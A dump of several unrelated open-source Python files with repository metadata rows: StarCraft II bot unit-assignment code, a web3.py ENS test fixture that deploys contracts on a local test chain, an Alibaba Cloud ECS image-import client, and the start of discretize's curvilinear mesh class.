units = units.sorted(sort_by_diff, True)
##
for unit in units:
unit: Unit
sorted_enemy_groups = PriorityQueue()
for p in unit_to_priorities[unit].iterate2():
priority = p[1]
own_val = d[p[0]].value
enemy_val = p[0].value
#should_fight, val = self.group_tactics.evaluate_engagement(d[p[0]], p[0], show_group_vals=True)
#own_val, enemy_val = val
# dont send lings vs voidrays
if not unit.can_attack_air:
# TODO performance: dont recalculate for every unit
priority -= p[0].percentage_of_air_in_group * priority
# group oversaturation
oversaturation = 0
if own_val >= enemy_val:
diff = own_val - enemy_val
oversaturation = max(0.01, diff / (enemy_val if enemy_val else 1))
mult = max(0.01, 1 - oversaturation)
priority *= 0.5 + (mult / 2)
if self.unit_activation_function(unit, priority, p[0], oversaturation):
sorted_enemy_groups.enqueue(p[0], priority)
if sorted_enemy_groups.isEmpty():
continue
enemy_group: UnitGroup = sorted_enemy_groups.peek()
self.debug_service.text_world(f'{round(sorted_enemy_groups.peek2()[1],2)}', Point3((unit.position3d.x, unit.position3d.y - 0.35, unit.position3d.z)), Point3((0, 255, 0)), 12)
if (not unit.can_attack_air and enemy_group.percentage_of_air_in_group > 0.8) or (unit.type_id in {UnitTypeId.DRONE} and d[enemy_group].value > enemy_group.value):
d[enemy_group].retreaters.append(unit)
else:
d[enemy_group].units.append(unit)
# TODO consider cloak values
d[enemy_group].value += self.unit_type.get_unit_combat_value_enemy_group(unit.type_id, enemy_group.units) * sum(self.unit_type.get_resource_value(unit.type_id))
self.previously_assigned_units = {}
for key, value in d.items():
a = AssignedGroup()
a.enemies = key
a.group = self.group_service.create_group(value.units)
a.retreaters = self.group_service.create_group(value.retreaters)
groups.append(a)
for unit in a.group.units:
self.previously_assigned_units[unit.tag] = a.enemies.units.tags
return groups
def get_builder_units(self, own_units: Units, enemy_groups: PriorityQueue) -> {'unit tags'}:
'''Determines if any units in own group are in the ideal conditions to build into a different unit.
Returns all units that can build.'''
origins_build_queue = {get_unit_origin_type(unit_id) for unit_id in self.state.build_queue}.union({UnitTypeId.DRONE, UnitTypeId.PROBE, UnitTypeId.SCV})
return own_units.of_type(origins_build_queue)
def append_proxy_scouts(self, own_units : Units) -> None:
'''Will append a unit even if that unit is already in self.proxy_scouts, so be careful!'''
for unit in own_units:
self.give_scouting_order(unit)
self.proxy_scouts.append(unit)
def give_scouting_order(self, scout: Unit) -> None:
'''Gives a scouting order to the given scout unit.'''
if self.proxy_scout_idx == len(self.expansion_locations) - 1:
self.proxy_scout_idx = 0
pos = self.expansion_locations[self.proxy_scout_idx]
self.proxy_scout_idx += 1
self.action_service.add(scout.tag, scout.move(pos), 10)
def reassign_proxy_scouts(self) -> None:
'''Reassigns proxy scouts that have completed their mission. Deletes proxy scouts who have died.'''
#remove dead scouts from self.proxy_scouts
#TODO only do this when unit dies (on_unit_destroyed), however need to be careful about making this hookable because on_step is explicitly called
self.proxy_scouts = self.proxy_scouts.tags_in({scout.tag for scout in self.proxy_scouts if scout in self.state.own_units})
#assign scouts that are done to a new task
scouts_that_are_done: set = {scout for scout in self.proxy_scouts if scout.is_idle}
for scout in scouts_that_are_done:
self.give_scouting_order(scout)
def is_scout(self, u: Unit) -> bool:
'''Determines whether or not the given unit should be considered a scouting unit.'''
return is_combat_unit(u) and u.type_id not in {UnitTypeId.DRONE, UnitTypeId.QUEEN} and not u in self.proxy_scouts
| 51.535484 | 250 | 0.668315 |
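A self-contained toy illustration of the scaling performed in priority_apply_unit_modifier above; the decline curve is a stand-in, since steep_decline lives in the bot's util package, and the numbers are arbitrary:

# Toy version of the two modifiers: closer enemy groups, and groups a unit was
# already assigned to last iteration, keep more of their base priority.
def toy_priority(base, dist, map_diag, frac_previously_assigned):
    dist_frac = min(1.0, max(0.0, dist / map_diag))
    decline = (1.0 - dist_frac) ** 2                # stand-in for steep_decline
    dist_mod = (0.5 + decline) ** 2
    prev_mod = 1.0 + frac_previously_assigned
    return base * dist_mod * prev_mod

print(toy_priority(10.0, dist=5.0, map_diag=200.0, frac_previously_assigned=0.5))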
7a3d2044ddefd34afd795b0677e11a5e03eaca2a | 13,963 | py | Python | tests/ens/conftest.py | nathonNot/web3.py | 5cf1fb7b84b590baa9b98a79d04e67b1554349a5 | ["MIT"] | null | null | null | tests/ens/conftest.py | nathonNot/web3.py | 5cf1fb7b84b590baa9b98a79d04e67b1554349a5 | ["MIT"] | null | null | null | tests/ens/conftest.py | nathonNot/web3.py | 5cf1fb7b84b590baa9b98a79d04e67b1554349a5 | ["MIT"] | null | null | null |
import json
import pytest
from eth_tester import (
EthereumTester,
)
from ens import ENS
from ens.contract_data import (
registrar_abi,
registrar_bytecode,
registrar_bytecode_runtime,
resolver_abi,
resolver_bytecode,
resolver_bytecode_runtime,
reverse_registrar_abi,
reverse_registrar_bytecode,
reverse_registrar_bytecode_runtime,
reverse_resolver_abi,
reverse_resolver_bytecode,
reverse_resolver_bytecode_runtime,
)
from web3 import Web3
from web3.contract import (
Contract,
)
from web3.providers.eth_tester import (
EthereumTesterProvider,
)
def bytes32(val):
if isinstance(val, int):
result = Web3.toBytes(val)
else:
        raise TypeError('val %r could not be converted to bytes' % val)
if len(result) < 32:
return result.rjust(32, b'\0')
else:
return result
def deploy(w3, Factory, from_address, args=None):
args = args or []
factory = Factory(w3)
deploy_txn = factory.constructor(*args).transact({'from': from_address})
deploy_receipt = w3.eth.wait_for_transaction_receipt(deploy_txn)
assert deploy_receipt is not None
return factory(address=deploy_receipt['contractAddress'])
def DefaultReverseResolver(w3):
return w3.eth.contract(
bytecode=reverse_resolver_bytecode,
bytecode_runtime=reverse_resolver_bytecode_runtime,
abi=reverse_resolver_abi,
ContractFactoryClass=Contract,
)
def ReverseRegistrar(w3):
return w3.eth.contract(
bytecode=reverse_registrar_bytecode,
bytecode_runtime=reverse_registrar_bytecode_runtime,
abi=reverse_registrar_abi,
ContractFactoryClass=Contract,
)
def PublicResolverFactory(w3):
return w3.eth.contract(
bytecode=resolver_bytecode,
bytecode_runtime=resolver_bytecode_runtime,
abi=resolver_abi,
ContractFactoryClass=Contract,
)
def ENSFactory(w3):
return w3.eth.contract(
bytecode="6060604052341561000f57600080fd5b60008080526020527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb58054600160a060020a033316600160a060020a0319909116179055610501806100626000396000f300606060405236156100805763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630178b8bf811461008557806302571be3146100b757806306ab5923146100cd57806314ab9038146100f457806316a25cbd146101175780631896f70a1461014a5780635b0fc9c31461016c575b600080fd5b341561009057600080fd5b61009b60043561018e565b604051600160a060020a03909116815260200160405180910390f35b34156100c257600080fd5b61009b6004356101ac565b34156100d857600080fd5b6100f2600435602435600160a060020a03604435166101c7565b005b34156100ff57600080fd5b6100f260043567ffffffffffffffff60243516610289565b341561012257600080fd5b61012d600435610355565b60405167ffffffffffffffff909116815260200160405180910390f35b341561015557600080fd5b6100f2600435600160a060020a036024351661038c565b341561017757600080fd5b6100f2600435600160a060020a0360243516610432565b600090815260208190526040902060010154600160a060020a031690565b600090815260208190526040902054600160a060020a031690565b600083815260208190526040812054849033600160a060020a039081169116146101f057600080fd5b8484604051918252602082015260409081019051908190039020915083857fce0457fe73731f824cc272376169235128c118b49d344817417c6d108d155e8285604051600160a060020a03909116815260200160405180910390a3506000908152602081905260409020805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a03929092169190911790555050565b600082815260208190526040902054829033600160a060020a039081169116146102b257600080fd5b827f1d4f9bbfc9cab89d66e1a1562f2233ccbf1308cb4f63de2ead5787adddb8fa688360405167ffffffffffffffff909116815260200160405180910390a250600091825260208290526040909120600101805467ffffffffffffffff90921674010000000000000000000000000000000000000000027fffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffff909216919091179055565b60009081526020819052604090206001015474010000000000000000000000000000000000000000900467ffffffffffffffff1690565b600082815260208190526040902054829033600160a060020a039081169116146103b557600080fd5b827f335721b01866dc23fbee8b6b2c7b1e14d6f05c28cd35a2c934239f94095602a083604051600160a060020a03909116815260200160405180910390a250600091825260208290526040909120600101805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a03909216919091179055565b600082815260208190526040902054829033600160a060020a0390811691161461045b57600080fd5b827fd4735d920b0f87494915f556dd9b54c8f309026070caea5c737245152564d26683604051600160a060020a03909116815260200160405180910390a250600091825260208290526040909120805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a039092169190911790555600a165627a7a7230582050975b6c54a16d216b563f4c4960d6ebc5881eb1ec73c2ef1f87920a251159530029", # noqa: E501
bytecode_runtime="606060405236156100805763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630178b8bf811461008557806302571be3146100b757806306ab5923146100cd57806314ab9038146100f457806316a25cbd146101175780631896f70a1461014a5780635b0fc9c31461016c575b600080fd5b341561009057600080fd5b61009b60043561018e565b604051600160a060020a03909116815260200160405180910390f35b34156100c257600080fd5b61009b6004356101ac565b34156100d857600080fd5b6100f2600435602435600160a060020a03604435166101c7565b005b34156100ff57600080fd5b6100f260043567ffffffffffffffff60243516610289565b341561012257600080fd5b61012d600435610355565b60405167ffffffffffffffff909116815260200160405180910390f35b341561015557600080fd5b6100f2600435600160a060020a036024351661038c565b341561017757600080fd5b6100f2600435600160a060020a0360243516610432565b600090815260208190526040902060010154600160a060020a031690565b600090815260208190526040902054600160a060020a031690565b600083815260208190526040812054849033600160a060020a039081169116146101f057600080fd5b8484604051918252602082015260409081019051908190039020915083857fce0457fe73731f824cc272376169235128c118b49d344817417c6d108d155e8285604051600160a060020a03909116815260200160405180910390a3506000908152602081905260409020805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a03929092169190911790555050565b600082815260208190526040902054829033600160a060020a039081169116146102b257600080fd5b827f1d4f9bbfc9cab89d66e1a1562f2233ccbf1308cb4f63de2ead5787adddb8fa688360405167ffffffffffffffff909116815260200160405180910390a250600091825260208290526040909120600101805467ffffffffffffffff90921674010000000000000000000000000000000000000000027fffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffff909216919091179055565b60009081526020819052604090206001015474010000000000000000000000000000000000000000900467ffffffffffffffff1690565b600082815260208190526040902054829033600160a060020a039081169116146103b557600080fd5b827f335721b01866dc23fbee8b6b2c7b1e14d6f05c28cd35a2c934239f94095602a083604051600160a060020a03909116815260200160405180910390a250600091825260208290526040909120600101805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a03909216919091179055565b600082815260208190526040902054829033600160a060020a0390811691161461045b57600080fd5b827fd4735d920b0f87494915f556dd9b54c8f309026070caea5c737245152564d26683604051600160a060020a03909116815260200160405180910390a250600091825260208290526040909120805473ffffffffffffffffffffffffffffffffffffffff1916600160a060020a039092169190911790555600a165627a7a7230582050975b6c54a16d216b563f4c4960d6ebc5881eb1ec73c2ef1f87920a251159530029", # noqa: E501
abi=json.loads('[{"constant":true,"inputs":[{"name":"node","type":"bytes32"}],"name":"resolver","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"node","type":"bytes32"}],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"node","type":"bytes32"},{"name":"label","type":"bytes32"},{"name":"owner","type":"address"}],"name":"setSubnodeOwner","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"node","type":"bytes32"},{"name":"ttl","type":"uint64"}],"name":"setTTL","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"node","type":"bytes32"}],"name":"ttl","outputs":[{"name":"","type":"uint64"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"node","type":"bytes32"},{"name":"resolver","type":"address"}],"name":"setResolver","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"node","type":"bytes32"},{"name":"owner","type":"address"}],"name":"setOwner","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"name":"node","type":"bytes32"},{"indexed":true,"name":"label","type":"bytes32"},{"indexed":false,"name":"owner","type":"address"}],"name":"NewOwner","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"node","type":"bytes32"},{"indexed":false,"name":"owner","type":"address"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"node","type":"bytes32"},{"indexed":false,"name":"resolver","type":"address"}],"name":"NewResolver","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"node","type":"bytes32"},{"indexed":false,"name":"ttl","type":"uint64"}],"name":"NewTTL","type":"event"}]'), # noqa: E501
ContractFactoryClass=Contract,
)
def ETHRegistrarFactory(w3):
return w3.eth.contract(
bytecode=registrar_bytecode,
bytecode_runtime=registrar_bytecode_runtime,
abi=registrar_abi,
ContractFactoryClass=Contract,
)
# session scope for performance
@pytest.fixture(scope="session")
def ens_setup():
w3 = Web3(EthereumTesterProvider(EthereumTester()))
# ** Set up ENS contracts **
# remove account that creates ENS, so test transactions don't have write access
accounts = w3.eth.accounts
ens_key = accounts.pop()
# create ENS contract
eth_labelhash = w3.keccak(text='eth')
eth_namehash = bytes32(0x93cdeb708b7545dc668eb9280176169d1c33cfd8ed6f04690a0bcc88a93fc4ae)
resolver_namehash = bytes32(0xfdd5d5de6dd63db72bbc2d487944ba13bf775b50a80805fe6fcaba9b0fba88f5)
reverse_tld_namehash = bytes32(0xa097f6721ce401e757d1223a763fef49b8b5f90bb18567ddb86fd205dff71d34) # noqa: E501
reverser_namehash = bytes32(0x91d1777781884d03a6757a803996e38de2a42967fb37eeaca72729271025a9e2)
ens_contract = deploy(w3, ENSFactory, ens_key)
# create public resolver
public_resolver = deploy(w3, PublicResolverFactory, ens_key, args=[ens_contract.address])
# set 'resolver.eth' to resolve to public resolver
ens_contract.functions.setSubnodeOwner(
b'\0' * 32,
eth_labelhash,
ens_key
).transact({'from': ens_key})
ens_contract.functions.setSubnodeOwner(
eth_namehash,
w3.keccak(text='resolver'),
ens_key
).transact({'from': ens_key})
ens_contract.functions.setResolver(
resolver_namehash,
public_resolver.address
).transact({'from': ens_key})
public_resolver.functions.setAddr(
resolver_namehash,
public_resolver.address
).transact({'from': ens_key})
# create .eth auction registrar
eth_registrar = deploy(
w3,
ETHRegistrarFactory,
ens_key,
args=[ens_contract.address, eth_namehash, 1],
)
# set '.eth' to resolve to the registrar
ens_contract.functions.setResolver(
eth_namehash,
public_resolver.address
).transact({'from': ens_key})
public_resolver.functions.setAddr(
eth_namehash,
eth_registrar.address
).transact({'from': ens_key})
# create reverse resolver
reverse_resolver = deploy(w3, DefaultReverseResolver, ens_key, args=[ens_contract.address])
# create reverse registrar
reverse_registrar = deploy(
w3,
ReverseRegistrar,
ens_key,
args=[ens_contract.address, reverse_resolver.address]
)
# set 'addr.reverse' to resolve to reverse registrar
ens_contract.functions.setSubnodeOwner(
b'\0' * 32,
w3.keccak(text='reverse'),
ens_key
).transact({'from': ens_key})
ens_contract.functions.setSubnodeOwner(
reverse_tld_namehash,
w3.keccak(text='addr'),
ens_key
).transact({'from': ens_key})
ens_contract.functions.setResolver(
reverser_namehash,
public_resolver.address
).transact({'from': ens_key})
public_resolver.functions.setAddr(
reverser_namehash,
reverse_registrar.address
).transact({'from': ens_key})
# set owner of tester.eth to an account controlled by tests
ens_contract.functions.setSubnodeOwner(
eth_namehash,
w3.keccak(text='tester'),
w3.eth.accounts[2] # note that this does not have to be the default, only in the list
).transact({'from': ens_key})
# make the registrar the owner of the 'eth' name
ens_contract.functions.setSubnodeOwner(
b'\0' * 32,
eth_labelhash,
eth_registrar.address
).transact({'from': ens_key})
# make the reverse registrar the owner of the 'addr.reverse' name
ens_contract.functions.setSubnodeOwner(
reverse_tld_namehash,
w3.keccak(text='addr'),
reverse_registrar.address
).transact({'from': ens_key})
return ENS.fromWeb3(w3, ens_contract.address)
@pytest.fixture
def ens(ens_setup, mocker):
mocker.patch('web3.middleware.stalecheck._isfresh', return_value=True)
ens_setup.w3.eth.default_account = ens_setup.w3.eth.coinbase
return ens_setup
@pytest.fixture()
def TEST_ADDRESS(address_conversion_func):
return address_conversion_func("0x000000000000000000000000000000000000dEaD")
| 60.708696 | 2,792 | 0.80477 |
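A hedged sketch of how a test might consume the ens fixture above; it is a hypothetical test, relying only on ENS.owner() from web3's ens module and on 'tester.eth' being handed to w3.eth.accounts[2] in the fixture:

# Hypothetical test -- depends only on names the fixture above sets up.
def test_tester_eth_owner(ens):
    owner = ens.owner('tester.eth')
    assert owner == ens.w3.eth.accounts[2]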
fb674597ad56189ac37eef75a7188f2742d97a7a | 7,425 | py | Python | src/lib/python/image/alibaba_client.py | memes/f5-bigip-image-generator | 9684d185db3990fc966554c0611fe6369174303b | ["Apache-2.0"] | 34 | 2019-08-21T01:28:27.000Z | 2021-10-05T07:21:58.000Z | src/lib/python/image/alibaba_client.py | memes/f5-bigip-image-generator | 9684d185db3990fc966554c0611fe6369174303b | ["Apache-2.0"] | 34 | 2019-09-13T10:17:31.000Z | 2022-03-09T00:01:00.000Z | src/lib/python/image/alibaba_client.py | memes/f5-bigip-image-generator | 9684d185db3990fc966554c0611fe6369174303b | ["Apache-2.0"] | 16 | 2019-08-21T20:06:17.000Z | 2022-03-25T11:59:00.000Z |
"""Alibaba client module"""
# Copyright (C) 2019-2021 F5 Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import json
import aliyunsdkcore.request
from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException, ServerException
from aliyunsdkecs.request.v20140526.AddTagsRequest \
import AddTagsRequest
from aliyunsdkecs.request.v20140526.DeleteImageRequest \
import DeleteImageRequest
from aliyunsdkecs.request.v20140526.DescribeImagesRequest \
import DescribeImagesRequest
from aliyunsdkecs.request.v20140526.ImportImageRequest \
import ImportImageRequest
from aliyunsdkecs.request.v20140526.CancelTaskRequest \
import CancelTaskRequest
from aliyunsdkecs.request.v20140526.DescribeTaskAttributeRequest \
import DescribeTaskAttributeRequest
from aliyunsdkecs.request.v20140526.DescribeImageSharePermissionRequest \
import DescribeImageSharePermissionRequest
from aliyunsdkecs.request.v20140526.ModifyImageSharePermissionRequest \
import ModifyImageSharePermissionRequest
from util.config import get_config_value
from util.logger import LOGGER
class AlibabaClient():
""" Class for sending requests to Alibaba cloud services """
@staticmethod
def __get_acs_client():
""" Setup and return a client to Alibaba cloud service.
Requires ALIBABA_ACCESS_KEY_ID and ALIBABA_ACCESS_KEY_SECRET to be set. """
client = AcsClient(get_config_value('ALIBABA_ACCESS_KEY_ID'),
get_config_value('ALIBABA_ACCESS_KEY_SECRET'),
get_config_value('ALIBABA_REGION'))
return client
def __send_request(self, request):
""" Send a request to Alibaba cloud services """
aliyunsdkcore.request.set_default_protocol_type('https')
request.set_protocol_type('https')
request.set_accept_format('json')
client = self.__get_acs_client()
try:
response_str = client.do_action_with_exception(request)
except ClientException as exc:
LOGGER.exception(exc)
raise RuntimeError('Check correctness of ALIBABA_REGION configuration variable') \
from exc
except ServerException as exc:
LOGGER.exception(exc)
if exc.get_error_code() == 'InvalidAccessKeyId.NotFound' and \
exc.get_error_msg() == 'Specified access key is not found.':
raise RuntimeError('InvalidAccessKeyId.NotFound: Check correctness of ' +
'ALIBABA_ACCESS_KEY_ID configuration variable') from exc
if exc.get_error_code() == 'IncompleteSignature' and \
exc.get_error_msg().startswith('The request signature does not conform to ' +
'Aliyun standards'):
raise RuntimeError('IncompleteSignature: Check correctness of ' +
'ALIBABA_ACCESS_KEY_SECRET configuration variable') from exc
if exc.get_error_code() == 'InvalidAccessKeySecret' and \
exc.get_error_msg() == 'The AccessKeySecret is incorrect. Please check ' + \
'your AccessKeyId and AccessKeySecret.':
raise RuntimeError('InvalidAccessKeySecret: Check correctness of ' +
'ALIBABA_ACCESS_KEY_ID and ALIBABA_ACCESS_KEY_SECRET ' +
'configuration variables') from exc
raise exc
response = json.loads(response_str)
if 'Code' in response.keys():
LOGGER.warning('Request to Alibaba has \'Code\' attribute. Full Alibaba response:')
LOGGER.warning(json.dumps(response, sort_keys=True, indent=4, separators=(',', ': ')))
return response
def add_tags(self, resource_id, resource_type, tags):
""" Add Resource Tags by resource id.
Return Alibaba response """
# Transform tags dictionary to array of dictionaries
tags_array = []
for key, value in tags.items():
array_entry = {"Key":key, "Value":value}
tags_array.append(array_entry)
request = AddTagsRequest()
request.set_ResourceId(resource_id)
request.set_ResourceType(resource_type)
request.set_Tags(tags_array)
return self.__send_request(request)
def delete_image(self, image_id):
""" Delete image by image id
Return Alibaba response """
request = DeleteImageRequest()
request.set_ImageId(image_id)
return self.__send_request(request)
def describe_images(self, image_id, image_name):
""" Send request to get details of images
Filter by image id and name
Return Alibaba response """
request = DescribeImagesRequest()
if image_id:
request.set_ImageId(image_id)
if image_name:
request.set_ImageName(image_name)
return self.__send_request(request)
def import_image(self, oss_bucket, oss_object, image_name):
""" Form and send request to to import image
Return Alibaba response """
oss_image = [{'OSSBucket': oss_bucket, 'OSSObject': oss_object}]
request = ImportImageRequest()
request.set_DiskDeviceMappings(oss_image)
request.set_OSType('Linux')
request.set_Architecture('x86_64')
request.set_Platform('Others Linux')
request.set_ImageName(image_name)
request.set_Description(image_name)
return self.__send_request(request)
def cancel_task(self, task_id):
""" Send request to cancel task by task id
Return Alibaba response """
request = CancelTaskRequest()
request.set_TaskId(task_id)
return self.__send_request(request)
def describe_task_attribute(self, task_id):
""" Send request to get task state with matching id
Return Alibaba response """
request = DescribeTaskAttributeRequest()
request.set_TaskId(task_id)
return self.__send_request(request)
def share_image_with_accounts(self, image_id, share_account_ids):
""" Send request to share image with other alibaba
accounts. Return Alibaba response """
request = ModifyImageSharePermissionRequest()
request.set_ImageId(image_id)
request.set_AddAccounts(share_account_ids)
return self.__send_request(request)
def describe_image_share_permission(self, image_id):
"""Print description of an image's share permissions"""
if image_id is None or not image_id:
raise Exception('No image id provided')
request = DescribeImageSharePermissionRequest()
if image_id:
request.set_ImageId(image_id)
return self.__send_request(request)
| 43.676471 | 98 | 0.673535 |
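A brief usage sketch of the import-then-poll flow these methods support; the bucket, object and image names are hypothetical, and the ALIBABA_* configuration values consumed by get_config_value are assumed to be set:

# Hypothetical flow: import an image from OSS, then poll the returned task.
client = AlibabaClient()
response = client.import_image('my-oss-bucket', 'images/bigip.qcow2', 'my-image')
task_id = response.get('TaskId')   # the ECS ImportImage response is expected to carry a TaskId
if task_id:
    status = client.describe_task_attribute(task_id)
    print(status.get('TaskStatus'))  # task status field from the ECS response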
7a935222c69ac2494c1d534c23a37a47c35ae88d | 15,969 | py | Python | discretize/curvilinear_mesh.py | ckohnke/discretize | f414dd7ee7c5ba9a141cb2c37d4b71fdc531eae8 | ["MIT"] | null | null | null | discretize/curvilinear_mesh.py | ckohnke/discretize | f414dd7ee7c5ba9a141cb2c37d4b71fdc531eae8 | ["MIT"] | null | null | null | discretize/curvilinear_mesh.py | ckohnke/discretize | f414dd7ee7c5ba9a141cb2c37d4b71fdc531eae8 | ["MIT"] | null | null | null |
import numpy as np
import properties
from discretize.utils import mkvc, index_cube, face_info, volume_tetrahedron
from discretize.base import BaseRectangularMesh
from discretize.operators import DiffOperators, InnerProducts
from discretize.utils.code_utils import deprecate_property
# Some helper functions.
def _length2D(x):
return (x[:, 0] ** 2 + x[:, 1] ** 2) ** 0.5
def _length3D(x):
return (x[:, 0] ** 2 + x[:, 1] ** 2 + x[:, 2] ** 2) ** 0.5
def _normalize2D(x):
return x / np.kron(np.ones((1, 2)), mkvc(_length2D(x), 2))
def _normalize3D(x):
return x / np.kron(np.ones((1, 3)), mkvc(_length3D(x), 2))
class CurvilinearMesh(BaseRectangularMesh, DiffOperators, InnerProducts):
"""CurvilinearMesh is a mesh class that deals with curvilinear meshes.
Example of a curvilinear mesh:
.. plot::
:include-source:
import discretize
X, Y = discretize.utils.exampleLrmGrid([3,3],'rotate')
mesh = discretize.CurvilinearMesh([X, Y])
mesh.plot_grid(show_it=True)
"""
_meshType = "Curv"
_aliases = {
**DiffOperators._aliases,
**BaseRectangularMesh._aliases,
**{
"gridCC": "cell_centers",
"gridN": "nodes",
"gridFx": "faces_x",
"gridFy": "faces_y",
"gridFz": "faces_z",
"gridEx": "edges_x",
"gridEy": "edges_y",
"gridEz": "edges_z",
},
}
node_list = properties.List(
"List of arrays describing the node locations",
prop=properties.Array(
"node locations in an n-dimensional array",
shape={("*", "*"), ("*", "*", "*")},
),
min_length=2,
max_length=3,
)
def __init__(self, node_list=None, **kwargs):
if 'nodes' in kwargs:
node_list = kwargs.pop('nodes')
self.node_list = node_list
if "_n" in kwargs.keys():
n = kwargs.pop("_n")
if np.any(n != np.array(self.node_list[0].shape) - 1):
raise ValueError(
"Unexpected n-values. {} was provided, {} was expected".format(
n, np.array(self.node_list[0].shape) - 1
)
)
else:
n = np.array(self.node_list[0].shape) - 1
BaseRectangularMesh.__init__(self, n, **kwargs)
# Save nodes to private variable _nodes as vectors
self._nodes = np.ones((self.node_list[0].size, self.dim))
for i, node_i in enumerate(self.node_list):
self._nodes[:, i] = mkvc(node_i.astype(float))
self.origin = self.nodes.min(axis=0)
@properties.validator("node_list")
def _check_nodes(self, change):
if len(change["value"]) <= 1:
raise ValueError("len(node) must be greater than 1")
for i, change["value"][i] in enumerate(change["value"]):
if change["value"][i].shape != change["value"][0].shape:
raise ValueError(
"change['value'][{0:d}] is not the same shape as "
"change['value'][0]".format(i)
)
if len(change["value"][0].shape) != len(change["value"]):
raise ValueError("Dimension mismatch")
@classmethod
def deserialize(cls, value, **kwargs):
if "nodes" in value:
value["node_list"] = value.pop("nodes")
return super().deserialize(value, **kwargs)
@property
def cell_centers(self):
"""
Cell-centered grid
"""
if getattr(self, "_cell_centers", None) is None:
self._cell_centers = np.concatenate(
[self.aveN2CC * self.gridN[:, i] for i in range(self.dim)]
).reshape((-1, self.dim), order="F")
return self._cell_centers
@property
def nodes(self):
"""
Nodal grid.
"""
if getattr(self, "_nodes", None) is None:
raise Exception("Someone deleted this. I blame you.")
return self._nodes
@property
def faces_x(self):
"""
Face staggered grid in the x direction.
"""
if getattr(self, "_faces_x", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
if self.dim == 2:
XY = [mkvc(0.5 * (n[:, :-1] + n[:, 1:])) for n in N]
self._faces_x = np.c_[XY[0], XY[1]]
elif self.dim == 3:
XYZ = [
mkvc(
0.25
* (
n[:, :-1, :-1]
+ n[:, :-1, 1:]
+ n[:, 1:, :-1]
+ n[:, 1:, 1:]
)
)
for n in N
]
self._faces_x = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._faces_x
@property
def faces_y(self):
"""
Face staggered grid in the y direction.
"""
if getattr(self, "_faces_y", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
if self.dim == 2:
XY = [mkvc(0.5 * (n[:-1, :] + n[1:, :])) for n in N]
self._faces_y = np.c_[XY[0], XY[1]]
elif self.dim == 3:
XYZ = [
mkvc(
0.25
* (
n[:-1, :, :-1]
+ n[:-1, :, 1:]
+ n[1:, :, :-1]
+ n[1:, :, 1:]
)
)
for n in N
]
self._faces_y = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._faces_y
@property
def faces_z(self):
"""
        Face staggered grid in the z direction.
"""
if getattr(self, "_faces_z", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
XYZ = [
mkvc(
0.25
* (n[:-1, :-1, :] + n[:-1, 1:, :] + n[1:, :-1, :] + n[1:, 1:, :])
)
for n in N
]
self._faces_z = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._faces_z
@property
def edges_x(self):
"""
Edge staggered grid in the x direction.
"""
if getattr(self, "_edges_x", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
if self.dim == 2:
XY = [mkvc(0.5 * (n[:-1, :] + n[1:, :])) for n in N]
self._edges_x = np.c_[XY[0], XY[1]]
elif self.dim == 3:
XYZ = [mkvc(0.5 * (n[:-1, :, :] + n[1:, :, :])) for n in N]
self._edges_x = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._edges_x
@property
def edges_y(self):
"""
Edge staggered grid in the y direction.
"""
if getattr(self, "_edges_y", None) is None:
N = self.reshape(self.gridN, "N", "N", "M")
if self.dim == 2:
XY = [mkvc(0.5 * (n[:, :-1] + n[:, 1:])) for n in N]
self._edges_y = np.c_[XY[0], XY[1]]
elif self.dim == 3:
XYZ = [mkvc(0.5 * (n[:, :-1, :] + n[:, 1:, :])) for n in N]
self._edges_y = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._edges_y
@property
def edges_z(self):
"""
Edge staggered grid in the z direction.
"""
if getattr(self, "_edges_z", None) is None and self.dim == 3:
N = self.reshape(self.gridN, "N", "N", "M")
XYZ = [mkvc(0.5 * (n[:, :, :-1] + n[:, :, 1:])) for n in N]
self._edges_z = np.c_[XYZ[0], XYZ[1], XYZ[2]]
return self._edges_z
# --------------- Geometries ---------------------
#
#
# ------------------- 2D -------------------------
#
# node(i,j) node(i,j+1)
# A -------------- B
# | |
# | cell(i,j) |
# | I |
# | |
# D -------------- C
# node(i+1,j) node(i+1,j+1)
#
# ------------------- 3D -------------------------
#
#
# node(i,j,k+1) node(i,j+1,k+1)
# E --------------- F
